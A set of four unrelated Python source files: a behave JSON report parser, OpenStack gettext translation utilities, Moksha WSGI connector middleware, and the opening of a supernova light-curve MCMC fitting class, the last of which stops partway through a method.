import simplejson as json
# ----------------------------------------------------------------------------
# FUNCTIONS:
# ----------------------------------------------------------------------------
def parse(json_filename, encoding="UTF-8"):
"""
Reads a behave JSON output file back in and stores the information in
behave model elements.
:param json_filename: JSON filename to process.
:param encoding: Text encoding of the JSON output file (default: UTF-8).
:return: List of feature objects.
"""
with codecs.open(json_filename, "rU", encoding=encoding) as fp:
json_data = json.load(fp, encoding=encoding)
json_processor = JsonParser()
features = json_processor.parse_features(json_data)
return features
# ----------------------------------------------------------------------------
# CLASSES:
# ----------------------------------------------------------------------------
class JsonParser(object):
def parse_features(self, json_data):
assert isinstance(json_data, list)
features = []
json_features = json_data
for json_feature in json_features:
feature = self.parse_feature(json_feature)
features.append(feature)
return features
def parse_feature(self, json_feature):
name = json_feature.get("name", u"")
keyword = json_feature.get("keyword", None)
tags = json_feature.get("tags", [])
description = json_feature.get("description", [])
location = json_feature.get("location", u"")
filename, line = location.split(":")
feature = model.Feature(filename, line, keyword, name, tags, description)
json_elements = json_feature.get("elements", [])
for json_element in json_elements:
self.add_feature_element(feature, json_element)
return feature
def add_feature_element(self, feature, json_element):
datatype = json_element.get("type", u"")
category = datatype.lower()
if category == "background":
background = self.parse_background(json_element)
feature.background = background
elif category == "scenario":
scenario = self.parse_scenario(json_element)
feature.add_scenario(scenario)
elif category == "scenario_outline":
scenario_outline = self.parse_scenario_outline(json_element)
feature.add_scenario(scenario_outline)
self.current_scenario_outline = scenario_outline
# elif category == "examples":
# examples = self.parse_examples(json_element)
# self.current_scenario_outline.examples = examples
else:
raise KeyError("Invalid feature-element keyword: %s" % category)
def parse_background(self, json_element):
"""
self.add_feature_element({
'keyword': background.keyword,
'location': background.location,
'steps': [],
})
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
location = json_element.get("location", u"")
json_steps = json_element.get("steps", [])
steps = self.parse_steps(json_steps)
filename, line = location.split(":")
background = model.Background(filename, line, keyword, name, steps)
return background
def parse_scenario(self, json_element):
"""
self.add_feature_element({
'keyword': scenario.keyword,
'name': scenario.name,
'tags': scenario.tags,
'location': scenario.location,
'steps': [],
})
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
description = json_element.get("description", [])
tags = json_element.get("tags", [])
location = json_element.get("location", u"")
json_steps = json_element.get("steps", [])
steps = self.parse_steps(json_steps)
filename, line = location.split(":")
scenario = model.Scenario(filename, line, keyword, name, tags, steps)
scenario.description = description
return scenario
def parse_scenario_outline(self, json_element):
"""
self.add_feature_element({
'keyword': scenario_outline.keyword,
'name': scenario_outline.name,
'tags': scenario_outline.tags,
'location': scenario_outline.location,
'steps': [],
'examples': [],
})
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
description = json_element.get("description", [])
tags = json_element.get("tags", [])
location = json_element.get("location", u"")
json_steps = json_element.get("steps", [])
json_examples = json_element.get("examples", [])
steps = self.parse_steps(json_steps)
examples = []
if json_examples:
examples = self.parse_examples(json_examples)
filename, line = location.split(":")
scenario_outline = model.ScenarioOutline(filename, line, keyword, name,
tags=tags, steps=steps, examples=examples)
scenario_outline.description = description
return scenario_outline
def parse_steps(self, json_steps):
steps = []
for json_step in json_steps:
step = self.parse_step(json_step)
steps.append(step)
return steps
def parse_step(self, json_element):
"""
s = {
'keyword': step.keyword,
'step_type': step.step_type,
'name': step.name,
'location': step.location,
}
if step.text:
s['text'] = step.text
if step.table:
s['table'] = self.make_table(step.table)
element = self.current_feature_element
element['steps'].append(s)
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
step_type = json_element.get("step_type", u"")
location = json_element.get("location", u"")
text = json_element.get("text", None)
if isinstance(text, list):
text = "\n".join(text)
table = None
json_table = json_element.get("table", None)
if json_table:
table = self.parse_table(json_table)
filename, line = location.split(":")
step = model.Step(filename, line, keyword, step_type, name)
step.text = text
step.table = table
json_result = json_element.get("result", None)
if json_result:
self.add_step_result(step, json_result)
return step
def add_step_result(self, step, json_result):
"""
steps = self.current_feature_element['steps']
steps[self._step_index]['result'] = {
'status': result.status,
'duration': result.duration,
}
"""
status = json_result.get("status", u"")
duration = json_result.get("duration", 0)
error_message = json_result.get("error_message", None)
if isinstance(error_message, list):
error_message = "\n".join(error_message)
step.status = status
step.duration = duration
step.error_message = error_message
def parse_table(self, json_table):
"""
table_data = {
'headings': table.headings,
'rows': [ list(row) for row in table.rows ]
}
return table_data
"""
headings = json_table.get("headings", [])
rows = json_table.get("rows", [])
table = model.Table(headings, rows=rows)
return table
def parse_examples(self, json_element):
"""
e = {
'keyword': examples.keyword,
'name': examples.name,
'location': examples.location,
}
if examples.table:
e['table'] = self.make_table(examples.table)
element = self.current_feature_element
element['examples'].append(e)
"""
keyword = json_element.get("keyword", u"")
name = json_element.get("name", u"")
location = json_element.get("location", u"")
table = None
json_table = json_element.get("table", None)
if json_table:
table = self.parse_table(json_table)
filename, line = location.split(":")
examples = model.Examples(filename, line, keyword, name, table)
return examples
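# ----------------------------------------------------------------------------
# MAIN (usage sketch):
# ----------------------------------------------------------------------------
# A minimal usage sketch; the report path is hypothetical, and iterating
# "feature.scenarios" assumes the usual behave.model.Feature attribute.
if __name__ == "__main__":
    for feature in parse("reports/behave.json"):
        print(u"%s: %s" % (feature.keyword, feature.name))
        for scenario in feature.scenarios:
            print(u"    %s: %s" % (scenario.keyword, scenario.name))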
|
|
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
gettext for openstack-common modules.
Usual usage in an openstack.common module:
from <project_name>.openstack.common.gettextutils import _
"""
import copy
import gettext
import locale
from logging import handlers
import os
from babel import localedata
import six
_AVAILABLE_LANGUAGES = {}
# FIXME(dhellmann): Remove this when moving to oslo.i18n.
USE_LAZY = False
class TranslatorFactory(object):
"""Create translator functions
"""
def __init__(self, domain, localedir=None):
"""Establish a set of translation functions for the domain.
:param domain: Name of translation domain,
specifying a message catalog.
:type domain: str
:param localedir: Directory with translation catalogs.
:type localedir: str
"""
self.domain = domain
if localedir is None:
localedir = os.environ.get(domain.upper() + '_LOCALEDIR')
self.localedir = localedir
def _make_translation_func(self, domain=None):
"""Return a new translation function ready for use.
Takes into account whether or not lazy translation is being
done.
The domain can be specified to override the default from the
factory, but the localedir from the factory is always used
because we assume the log-level translation catalogs are
installed in the same directory as the main application
catalog.
"""
if domain is None:
domain = self.domain
t = gettext.translation(domain,
localedir=self.localedir,
fallback=True)
# Use the appropriate method of the translation object based
# on the python version.
m = t.gettext if six.PY3 else t.ugettext
def f(msg):
"""oslo.i18n.gettextutils translation function."""
if USE_LAZY:
return Message(msg, domain=domain)
return m(msg)
return f
@property
def primary(self):
"The default translation function."
return self._make_translation_func()
def _make_log_translation_func(self, level):
return self._make_translation_func(self.domain + '-log-' + level)
@property
def log_info(self):
"Translate info-level log messages."
return self._make_log_translation_func('info')
@property
def log_warning(self):
"Translate warning-level log messages."
return self._make_log_translation_func('warning')
@property
def log_error(self):
"Translate error-level log messages."
return self._make_log_translation_func('error')
@property
def log_critical(self):
"Translate critical-level log messages."
return self._make_log_translation_func('critical')
# NOTE(dhellmann): When this module moves out of the incubator into
# oslo.i18n, these global variables can be moved to an integration
# module within each application.
# Create the global translation functions.
_translators = TranslatorFactory('<project_name>')
# The primary translation function using the well-known name "_"
_ = _translators.primary
# Translators for log levels.
#
# The abbreviated names are meant to reflect the usual use of a short
# name like '_'. The "L" is for "log" and the other letter comes from
# the level.
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
# NOTE(dhellmann): End of globals that will move to the application's
# integration module.
def enable_lazy():
"""Convenience function for configuring _() to use lazy gettext
Call this at the start of execution to enable the gettextutils._
function to use lazy gettext functionality. This is useful if
your project is importing _ directly instead of using the
gettextutils.install() way of importing the _ function.
"""
global USE_LAZY
USE_LAZY = True
def install(domain):
"""Install a _() function using the given translation domain.
Given a translation domain, install a _() function using gettext's
install() function.
The main difference from gettext.install() is that we allow
overriding the default localedir (e.g. /usr/share/locale) using
a translation-domain-specific environment variable (e.g.
NOVA_LOCALEDIR).
Note that to enable lazy translation, enable_lazy must be
called.
:param domain: the translation domain
"""
from six import moves
tf = TranslatorFactory(domain)
moves.builtins.__dict__['_'] = tf.primary
class Message(six.text_type):
"""A Message object is a unicode object that can be translated.
Translation of Message is done explicitly using the translate() method.
For all non-translation intents and purposes, a Message is simply unicode,
and can be treated as such.
"""
def __new__(cls, msgid, msgtext=None, params=None,
domain='<project_name>', *args):
"""Create a new Message object.
In order for translation to work gettext requires a message ID, this
msgid will be used as the base unicode text. It is also possible
for the msgid and the base unicode text to be different by passing
the msgtext parameter.
"""
# If the base msgtext is not given, we use the default translation
# of the msgid (which is in English) just in case the system locale is
# not English, so that the base text will be in that locale by default.
if not msgtext:
msgtext = Message._translate_msgid(msgid, domain)
# We want to initialize the parent unicode with the actual object that
# would have been plain unicode if 'Message' was not enabled.
msg = super(Message, cls).__new__(cls, msgtext)
msg.msgid = msgid
msg.domain = domain
msg.params = params
return msg
def translate(self, desired_locale=None):
"""Translate this message to the desired locale.
:param desired_locale: The desired locale to translate the message to,
if no locale is provided the message will be
translated to the system's default locale.
:returns: the translated message in unicode
"""
translated_message = Message._translate_msgid(self.msgid,
self.domain,
desired_locale)
if self.params is None:
# No need for more translation
return translated_message
# This Message object may have been formatted with one or more
# Message objects as substitution arguments, given either as a single
# argument, part of a tuple, or as one or more values in a dictionary.
# When translating this Message we need to translate those Messages too
translated_params = _translate_args(self.params, desired_locale)
translated_message = translated_message % translated_params
return translated_message
@staticmethod
def _translate_msgid(msgid, domain, desired_locale=None):
if not desired_locale:
system_locale = locale.getdefaultlocale()
# If the system locale is not available to the runtime use English
if not system_locale[0]:
desired_locale = 'en_US'
else:
desired_locale = system_locale[0]
locale_dir = os.environ.get(domain.upper() + '_LOCALEDIR')
lang = gettext.translation(domain,
localedir=locale_dir,
languages=[desired_locale],
fallback=True)
if six.PY3:
translator = lang.gettext
else:
translator = lang.ugettext
translated_message = translator(msgid)
return translated_message
def __mod__(self, other):
# When we mod a Message we want the actual operation to be performed
# by the parent class (i.e. unicode()), the only thing we do here is
# save the original msgid and the parameters in case of a translation
params = self._sanitize_mod_params(other)
unicode_mod = super(Message, self).__mod__(params)
modded = Message(self.msgid,
msgtext=unicode_mod,
params=params,
domain=self.domain)
return modded
def _sanitize_mod_params(self, other):
"""Sanitize the object being modded with this Message.
- Add support for modding 'None' so translation supports it
- Trim the modded object, which can be a large dictionary, to only
those keys that would actually be used in a translation
- Snapshot the object being modded, in case the message is
translated, it will be used as it was when the Message was created
"""
if other is None:
params = (other,)
elif isinstance(other, dict):
# Merge the dictionaries
# Copy each item in case one does not support deep copy.
params = {}
if isinstance(self.params, dict):
for key, val in self.params.items():
params[key] = self._copy_param(val)
for key, val in other.items():
params[key] = self._copy_param(val)
else:
params = self._copy_param(other)
return params
def _copy_param(self, param):
try:
return copy.deepcopy(param)
except Exception:
# Fall back to casting to unicode; this handles the Python
# code-like objects that can't be deep-copied.
return six.text_type(param)
def __add__(self, other):
msg = _('Message objects do not support addition.')
raise TypeError(msg)
def __radd__(self, other):
return self.__add__(other)
if six.PY2:
def __str__(self):
# NOTE(luisg): Logging in python 2.6 tries to str() log records,
# and it expects specifically a UnicodeError in order to proceed.
msg = _('Message objects do not support str() because they may '
'contain non-ascii characters. '
'Please use unicode() or translate() instead.')
raise UnicodeError(msg)
def get_available_languages(domain):
"""Lists the available languages for the given translation domain.
:param domain: the domain to get languages for
"""
if domain in _AVAILABLE_LANGUAGES:
return copy.copy(_AVAILABLE_LANGUAGES[domain])
localedir = '%s_LOCALEDIR' % domain.upper()
find = lambda x: gettext.find(domain,
localedir=os.environ.get(localedir),
languages=[x])
# NOTE(mrodden): en_US should always be available (and first in case
# order matters) since our in-line message strings are en_US
language_list = ['en_US']
# NOTE(luisg): Babel <1.0 used a function called list(), which was
# renamed to locale_identifiers() in >=1.0, the requirements master list
# requires >=0.9.6, uncapped, so defensively work with both. We can remove
# this check when the master list updates to >=1.0, and update all projects
list_identifiers = (getattr(localedata, 'list', None) or
getattr(localedata, 'locale_identifiers'))
locale_identifiers = list_identifiers()
for i in locale_identifiers:
if find(i) is not None:
language_list.append(i)
# NOTE(luisg): Babel>=1.0,<1.3 has a bug where some OpenStack supported
# locales (e.g. 'zh_CN', and 'zh_TW') aren't supported even though they
# are perfectly legitimate locales:
# https://github.com/mitsuhiko/babel/issues/37
# In Babel 1.3 they fixed the bug and they support these locales, but
# they are still not explicitly "listed" by locale_identifiers().
# That is why we add the locales here explicitly if necessary so that
# they are listed as supported.
aliases = {'zh': 'zh_CN',
'zh_Hant_HK': 'zh_HK',
'zh_Hant': 'zh_TW',
'fil': 'tl_PH'}
for (locale_, alias) in six.iteritems(aliases):
if locale_ in language_list and alias not in language_list:
language_list.append(alias)
_AVAILABLE_LANGUAGES[domain] = language_list
return copy.copy(language_list)
def translate(obj, desired_locale=None):
"""Gets the translated unicode representation of the given object.
If the object is not translatable it is returned as-is.
If the locale is None the object is translated to the system locale.
:param obj: the object to translate
:param desired_locale: the locale to translate the message to, if None the
default system locale will be used
:returns: the translated object in unicode, or the original object if
it could not be translated
"""
message = obj
if not isinstance(message, Message):
# If the object to translate is not already translatable,
# let's first get its unicode representation
message = six.text_type(obj)
if isinstance(message, Message):
# Even after unicoding() we still need to check if we are
# running with translatable unicode before translating
return message.translate(desired_locale)
return obj
def _translate_args(args, desired_locale=None):
"""Translates all the translatable elements of the given arguments object.
This method is used for translating the translatable values in method
arguments which include values of tuples or dictionaries.
If the object is not a tuple or a dictionary the object itself is
translated if it is translatable.
If the locale is None the object is translated to the system locale.
:param args: the args to translate
:param desired_locale: the locale to translate the args to, if None the
default system locale will be used
:returns: a new args object with the translated contents of the original
"""
if isinstance(args, tuple):
return tuple(translate(v, desired_locale) for v in args)
if isinstance(args, dict):
translated_dict = {}
for (k, v) in six.iteritems(args):
translated_v = translate(v, desired_locale)
translated_dict[k] = translated_v
return translated_dict
return translate(args, desired_locale)
class TranslationHandler(handlers.MemoryHandler):
"""Handler that translates records before logging them.
The TranslationHandler takes a locale and a target logging.Handler object
to forward LogRecord objects to after translating them. This handler
depends on Message objects being logged, instead of regular strings.
The handler can be configured declaratively in the logging.conf as follows:
[handlers]
keys = translatedlog, translator
[handler_translatedlog]
class = handlers.WatchedFileHandler
args = ('/var/log/api-localized.log',)
formatter = context
[handler_translator]
class = openstack.common.log.TranslationHandler
target = translatedlog
args = ('zh_CN',)
If the specified locale is not available in the system, the handler will
log in the default locale.
"""
def __init__(self, locale=None, target=None):
"""Initialize a TranslationHandler
:param locale: locale to use for translating messages
:param target: logging.Handler object to forward
LogRecord objects to after translation
"""
# NOTE(luisg): In order to allow this handler to be a wrapper for
# other handlers, such as a FileHandler, and still be able to
# configure it using logging.conf, this handler has to extend
# MemoryHandler because only the MemoryHandlers' logging.conf
# parsing is implemented such that it accepts a target handler.
handlers.MemoryHandler.__init__(self, capacity=0, target=target)
self.locale = locale
def setFormatter(self, fmt):
self.target.setFormatter(fmt)
def emit(self, record):
# We save the message from the original record to restore it
# after translation, so other handlers are not affected by this
original_msg = record.msg
original_args = record.args
try:
self._translate_and_log_record(record)
finally:
record.msg = original_msg
record.args = original_args
def _translate_and_log_record(self, record):
record.msg = translate(record.msg, self.locale)
# In addition to translating the message, we also need to translate
# arguments that were passed to the log method that were not part
# of the main message, e.g., log.info(_('Some message %s'), this_one)
record.args = _translate_args(record.args, self.locale)
self.target.emit(record)
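if __name__ == '__main__':
    # A minimal sketch, assuming a hypothetical domain 'myproject' with no
    # installed catalogs, so gettext falls back to the original strings.
    import logging
    demo_factory = TranslatorFactory('myproject')
    demo_gettext = demo_factory.primary
    print(demo_gettext('Hello, world'))
    # Programmatic equivalent of the declarative logging.conf wiring shown in
    # the TranslationHandler docstring above.
    demo_target = logging.StreamHandler()
    demo_handler = TranslationHandler(locale='en_US', target=demo_target)
    demo_logger = logging.getLogger('gettextutils-demo')
    demo_logger.addHandler(demo_handler)
    demo_logger.error('plain message, forwarded untranslated')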
|
|
# This file is part of Moksha.
# Copyright (C) 2008-2010 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors: John (J5) Palmieri <[email protected]>
import logging
import pkg_resources
import urllib
import time
import os.path
import threading
try:
import json
except ImportError:
import simplejson as json
from paste.deploy.converters import asbool
from webob import Request, Response
from pprint import pformat
from tg import config
log = logging.getLogger(__name__)
class MokshaConnectorMiddleware(object):
"""
A layer of WSGI middleware that is responsible for handling every
moksha_connector request.
If a request for a connector comes in (/moksha_connector/$name), it will
run that connector as defined in its egg-info.
"""
_connectors = {}
profile_id_counter = 0
profile_id_counter_lock = threading.Lock()
def __init__(self, application):
log.info('Creating MokshaConnectorMiddleware')
self.application = application
# ids of profile data we are waiting to collect and record
self.outstanding_profile_ids = {}
self.load_connectors()
def strip_script(self, environ, path):
# Strips the script portion of a url path so the middleware works even
# when mounted under a path other than root
if path.startswith('/') and 'SCRIPT_NAME' in environ:
prefix = environ.get('SCRIPT_NAME')
if prefix.endswith('/'):
prefix = prefix[:-1]
if path.startswith(prefix):
path = path[len(prefix):]
return path
def prof_collector(self, environ, request, start_response):
p = request.params
profile_id = p['id']
directory = config.get('profile.dir', '')
if self.outstanding_profile_ids.pop(profile_id, False):
prof_file_name = "jsonrequest_%s.jsprof" % profile_id
# output profiling data
file_name = os.path.join(directory, prof_file_name)
f = open(file_name, 'w')
f.write('{"id": "%s", "start_time": %s, "callback_start_time": %s, "end_time": %s}'
% (profile_id, p['start_time'], p['callback_start_time'], p['end_time']))
f.close()
return Response('{}')(environ, start_response)
return Response(status='404 Not Found')(environ, start_response)
def __call__(self, environ, start_response):
request = Request(environ)
path = self.strip_script(environ, request.path)
if path.startswith('/moksha_connector'):
s = path.split('/')[2:]
# check to see if we need to hand this off to the profile collector
if s[0] == 'prof_collector':
return self.prof_collector(environ, request, start_response)
# since keys are not unique we need to condense them
# into an actual dictionary with multiple entries becoming lists
p = request.params
params = {}
for k in p.iterkeys():
if k == '_cookies':
# reserved parameter
# FIXME: provide a proper error response
return Response(status='404 Not Found')
if k not in params:
params[k] = p.getall(k)
if params[k] and len(params[k]) == 1:
params[k] = params[k][0]
try:
response = self._run_connector(environ, request,
s[0], s[1], *s[2:],
**params)
except IndexError, e:
log.info('Invalid connector path: %s' % str(e))
return Response(status='404 Not Found')(environ, start_response)
else:
response = request.get_response(self.application)
return response(environ, start_response)
def _run_connector(self, environ, request,
conn_name, op, *path,
**remote_params):
response = None
# check last part of path to see if it is json data
dispatch_params = {};
if len(path) > 0:
p = urllib.unquote_plus(path[-1].lstrip())
if p.startswith('{'):
dp = json.loads(p)
f = dp.get('filters')
if isinstance(f, basestring):
dp['filters'] = json.loads(f)
path = path[:-1]
# scrub dispatch_params keys of unicode so we can pass as keywords
for (k, v) in dp.iteritems():
dispatch_params[str(k)] = v
# prevent trailing slash
if not p:
path = path[:-1]
path = '/'.join(path)
else:
path = ''
conn = self._connectors.get(conn_name)
# pretty print output
pretty_print = False
if '_pp' in remote_params:
del remote_params['_pp']
pretty_print = True
if conn:
conn_obj = conn['connector_class'](environ, request)
r = None
if asbool(config.get('profile.connectors')):
try:
import cProfile as profile
except ImportError:
import profile
directory = config.get('profile.dir', '')
# Make sure the id is unique for each thread
self.profile_id_counter_lock.acquire()
prof_id_counter = self.profile_id_counter
self.profile_id_counter += 1
self.profile_id_counter_lock.release()
ip = request.remote_addr
timestamp = time.time()
profile_id = "%s_%f_%s_%i" % (conn_name, timestamp, ip, prof_id_counter)
self.outstanding_profile_ids[profile_id] = True
prof_file_name = "connector_%s.prof" % profile_id
info_file_name = "connector_%s.info" % profile_id
# output call info
file_name = os.path.join(directory, info_file_name)
f = open(file_name, 'w')
f.write('{"name": "%s", "op": "%s", "path": "%s", "remote_params": %s, "ip": "%s", "timestamp": %f, "id_counter": %i, "id": "%s"}'
% (conn_name, op, path, json.dumps(remote_params), ip, timestamp, prof_id_counter, profile_id))
f.close()
# in order to get the results back we need to pass an object
# by reference which will be populated with the actual results
result = {'r': None}
# profile call
file_name = os.path.join(directory, prof_file_name)
profile.runctx("result['r'] = conn_obj._dispatch(op, path, remote_params, **dispatch_params)",
None,
{'conn_obj': conn_obj,
'op': op,
'path': path,
'remote_params': remote_params,
'dispatch_params': dispatch_params,
'result': result},
file_name)
r = result['r']
# add profile id to results
r['moksha_profile_id'] = profile_id
else:
r = conn_obj._dispatch(op, path, remote_params, **dispatch_params)
if pretty_print:
r = '<pre>' + pformat(r) + '</pre>'
elif not isinstance(r, basestring):
r = json.dumps(r, separators=(',',':'))
if isinstance(r, unicode):
r = r.encode('utf-8', 'replace')
response = Response(r)
else:
response = Response(status='404 Not Found')
return response
def load_connectors(self):
log.info('Loading moksha connectors')
for conn_entry in pkg_resources.iter_entry_points('moksha.connector'):
log.info('Loading %s connector' % conn_entry.name)
conn_class = conn_entry.load()
# call the register class method
# FIXME: Should we pass some resource in?
conn_class.register()
conn_path = conn_entry.dist.location
self._connectors[conn_entry.name] = {
'name': conn_entry.name,
'connector_class': conn_class,
'path': conn_path,
}
def _get_connector(name, request=None):
# TODO: having a connection pool might be nice
cls = None
if name in MokshaConnectorMiddleware._connectors:
cls = MokshaConnectorMiddleware._connectors[name]['connector_class']
else:
# Look for it on the entry-point
for conn_entry in pkg_resources.iter_entry_points('moksha.connector'):
if conn_entry.name == name:
conn_class = conn_entry.load()
conn_class.register()
cls = conn_class
if request is None:
from pylons import request
if cls:
try:
return cls(request.environ, request)
except TypeError:
# Called outside of the WSGI stack
return cls(None, None)
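# A minimal wiring sketch, assuming a trivial WSGI application; a real
# deployment wraps the TurboGears/Pylons app and relies on connectors
# registered under the 'moksha.connector' entry point.
if __name__ == '__main__':
    from wsgiref.simple_server import make_server
    logging.basicConfig(level=logging.INFO)
    def demo_app(environ, start_response):
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return ['Hello from the wrapped application\n']
    wrapped_app = MokshaConnectorMiddleware(demo_app)
    # Serves until interrupted; connector requests go to /moksha_connector/...
    make_server('127.0.0.1', 8080, wrapped_app).serve_forever()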
|
|
#!/usr/bin/env python
"""
RS 2013/08/19: Stritzinger 2006 MCMC implementation
"""
# ----------------------------------------------------------------------------
# Dependencies
# ----------------------------------------------------------------------------
import numpy as np
import matplotlib.pyplot as pypl
from scipy.optimize import curve_fit
from BoloMass.SNMCMC import SNMCMC
import BoloMass.Arnett82 as Arnett82
from BoloMass.Utils import BadInputError, VerboseMsg
# ----------------------------------------------------------------------------
# Class and function definitions
# ----------------------------------------------------------------------------
class Stritz06_MCMC(SNMCMC):
"""Stritzinger+ 2006 models for comparison with Scalzo+ 2012"""
# Features of standard blob of chain, with upper and lower bounds
_features = {
# name, def, blo, hlo, hhi, bhi, res, fmt, label
'MWD': [ 1.4, 0.0, 0.5, 2.5, 2.8, 0.05, "{0:8.2f}",
"Ejected mass (M$_\\odot$)"],
'MNi': [ 0.6, 0.0, 0.0, 2.0, 2.8, 0.05, "{0:8.2f}",
"$^{56}$Ni mass (M$_\\odot$)"],
't0': [ 40, 15, 15, 75, 75, 2, "{0:8.1f}",
"$^{56}$Co $\\gamma$-ray timescale t$_0$(days)"],
'kappa': [ 0.025, 0.0, 0.02, 0.03, 0.05, 0.0005, "{0:8.3f}",
"$^{56}$Co $\\gamma$-ray opacity $\\kappa$ (cm$^2$ g$^{-1}$)"],
'v_e': [ 3000, 1000, 2000, 4000, 5000, 100, "{0:8.0f}",
"Scaling velocity v$_{e}$ (km s$^{-1}$)"],
'vsc': [10000, 7000, 7000, 14000, 14000, 100, "{0:8.0f}",
"Scaling velocity v$_{sc}$ (km s$^{-1}$)"],
'muoff': [ 0.0, -10.0, -1.0, 1.0, 10.0, 0.05, "{0:8.2f}",
"Distance modulus systematic (mag)"],
'q': [ 0.33, 0.0, 0.0, 0.65, 1.0, 0.05, "{0:8.2f}",
"$^{56}$Ni distribution form factor q"],
'trise': [17.6, 10.0, 10.0, 24.0, 24.0, 0.5, "{0:8.1f}",
"Rise time (days)"],
'uvcor': [ 0.1, 0.0, 0.0, 0.2, 0.2, 0.01, "{0:8.2f}",
"UV flux correction fraction"],
}
# Names of features to be used as main MCMC parameters
_mcmcpars = ['MWD', 'MNi', 'v_e', 'kappa', 'q', 'trise', 'muoff', 'uvcor']
# Names of features for which to report marginalized confidence intervals
_confints = ['MWD', 'MNi', 't0', 'v_e', 'vsc',
'kappa', 'q', 'trise', 'muoff', 'uvcor']
# Description of subplots to plot when MCMC is done running
# In _subplots, a 1-tuple produces a histogram, while a 2-tuple produces
# a marginalized joint confidence contour plot for both features.
_subplot_layout = (2, 2)
_subplots = [ ('MNi', 'MWD'), ('MWD',), ]
_contlvls = [0.01, 0.05, 0.16, 0.50, 0.84, 0.95, 0.99]
# Default keywords for __init__, with default values
# These include the default Stritzinger priors on trise, kappa, v_e, and q.
_init_kwdef = { 'muoff': 0.0, 'muoff_err': 1e-3,
'uvcor_lo': 0.0, 'uvcor_hi': 0.1,
'trise': 19.0, 'trise_err': 3.0,
'kappa': 0.025, 'kappa_err': 0.0025,
'v_e': 3000, 'v_e_err': 300,
'q': 0.3333, 'q_err': 0.1,
'sn_name': "", 'verbose': True }
def __init__(self, t, L, dL, **init_kwargs):
"""Initialize!
t: time since bolometric maximum light, in days
L: bolometric luminosity in erg/s
dL: 1-sigma error on bolometric luminosity in erg/s
muoff: offset to apply to distance modulus, if any
muoff_err: error on distance modulus offset
qtabpkl: filename of pickled QGP object
sn_name: name of SN (optional)
"""
# Unpack kwargs
kw = dict(self._init_kwdef)
kw.update(init_kwargs)
# First-pass initialization
self.name = kw['sn_name']
self.vmsg = VerboseMsg(prefix="Stritz06_MCMC({0})".format(self.name),
verbose=kw['verbose'], flush=True)
# In this version we only care about stuff near maximum light and at
# late times. Separate out the points we're actually going to fit.
AA = np.array
self.tfit, self.Lfit, self.dLfit = AA(t), AA(L), AA(dL)
t_max, t_late = np.abs(self.tfit).min(), 39.9
idx = np.any([self.tfit == t_max, self.tfit > t_late], axis=0)
nidx = np.invert(idx)
self.ifit, self.infit = idx, nidx
self.tfit, self.tnfit = self.tfit[idx], self.tfit[nidx]
self.Lfit, self.Lnfit = self.Lfit[idx], self.Lfit[nidx]
self.dLfit, self.dLnfit = self.dLfit[idx], self.dLfit[nidx]
self.vmsg("Fitting the following light curve:\n",
"\n".join(["{0:8.1f} {1:.3e} {2:.3e}".format(ti, Li, dLi)
for ti, Li, dLi in zip(self.tfit, self.Lfit, self.dLfit)]))
# Priors other than hard parameter bounds
self.trise_Pmu, self.trise_Psig = kw['trise'], kw['trise_err']
self.muoff_Pmu, self.muoff_Psig = kw['muoff'], kw['muoff_err']
self.kappa_Pmu, self.kappa_Psig = kw['kappa'], kw['kappa_err']
self.v_e_Pmu, self.v_e_Psig = kw['v_e'], kw['v_e_err']
self.q_Pmu, self.q_Psig = kw['q'], kw['q_err']
uvcor_lo, uvcor_hi = kw['uvcor_lo'], kw['uvcor_hi']
uvcor_av = 0.5*(uvcor_hi + uvcor_lo)
uvcor_ss = 0.01*(uvcor_hi - uvcor_lo)
self.uvcor_Plo, self.uvcor_Phi = uvcor_lo, uvcor_hi
self._features['uvcor'][0:6] = [uvcor_av, uvcor_lo, uvcor_lo,
uvcor_hi, uvcor_hi, uvcor_ss]
# A chi-square fit to the light curve has at most 2 degrees of freedom
# (MNi, t0) for goodness-of-fit, since those are the only parameters
# we're *fitting* (rest are marginalized).
self.ndof = max(1, len(self.tfit) - 2)
# Quick fit to the light curve and use it as the initial guess,
# if we have enough points; otherwise just assume the default.
if len(self.tfit) > 2:
MNi, t0 = self.leastsq_MNit0()
else:
MNi, t0 = 0.6, 40
sf = self._features
sf['MNi'][0] = MNi
sf['MWD'][0] = 1.4 - MNi
sf['trise'][0] = self.trise_Pmu
sf['muoff'][0] = self.muoff_Pmu
# Initialize the MCMC bits
SNMCMC.__init__(self, verbose=kw['verbose'])
def leastsq_MNit0(self):
"""Does a simple least-squares fit to get initial-guess (MNi, t0)"""
# Adjust for UV correction and distance modulus errors
Kmax = (1 + 0.5*(self.uvcor_Plo + self.uvcor_Phi))
my_tfit = self.tfit + self.trise_Pmu
my_Lfit = self.Lfit * 10**(-0.4*self.muoff_Pmu)
my_dLfit = self.dLfit * 10**(-0.4*self.muoff_Pmu)
my_Lfit[self.tfit < 10.0] *= Kmax
my_dLfit[self.tfit < 10.0] *= Kmax
# Fit the curve
epsL = lambda t, MNi, t0: MNi * Arnett82.epsilon(t, t0)
popt, pcov = curve_fit(epsL, my_tfit, my_Lfit, sigma=my_dLfit,
p0=[0.5, 40])
MNi_fit, t0_fit = popt
MNi_err, t0_err = pcov[0,0]**0.5, pcov[1,1]**0.5
# Report the results
self.vmsg("least squares fit gives",
"MNi = {0:.2f} +/- {1:.2f} Msol".format(MNi_fit, MNi_err),
"t0 = {0:.1f} +/- {1:.1f} days".format(t0_fit, t0_err))
